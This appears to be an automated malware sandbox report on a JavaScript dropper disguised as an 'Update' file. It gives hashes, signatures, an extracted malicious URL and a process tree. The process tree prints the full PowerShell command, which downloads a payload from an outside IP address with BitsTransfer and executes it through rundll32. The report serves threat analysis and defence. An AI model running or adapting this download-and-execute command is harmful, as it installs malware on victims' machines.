Resubmissions
15-08-2024 20:42
240815-zhg3jaxglr 1014-06-2024 12:05
240614-n89dxszekb 1028-05-2024 22:27
240528-2dhvdagb62 10Analysis
-
max time kernel
130s -
max time network
137s -
platform
windows10-1703_x64 -
resource
win10-20240611-es -
resource tags
arch:x64arch:x86image:win10-20240611-eslocale:es-esos:windows10-1703-x64systemwindows -
submitted
15-08-2024 20:42
Static task
static1
Behavioral task
behavioral1
Sample
Update_25_04_2024_3146918.js
Resource
win10-20240611-es
General
-
Target
Update_25_04_2024_3146918.js
-
Size
135KB
-
MD5
bf7f711e823916e5f56ff4d2286ee866
-
SHA1
d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729
-
SHA256
0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17
-
SHA512
842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941
-
SSDEEP
1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr
Malware Config
Extracted
http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid Process 2412 powershell.exe 2412 powershell.exe 2412 powershell.exe 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2412 powershell.exe Token: SeDebugPrivilege 3516 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
wscript.exepowershell.exedescription pid Process procid_target PID 2120 wrote to memory of 2412 2120 wscript.exe 71 PID 2120 wrote to memory of 2412 2120 wscript.exe 71 PID 2412 wrote to memory of 3516 2412 powershell.exe 73 PID 2412 wrote to memory of 3516 2412 powershell.exe 73
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js1⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a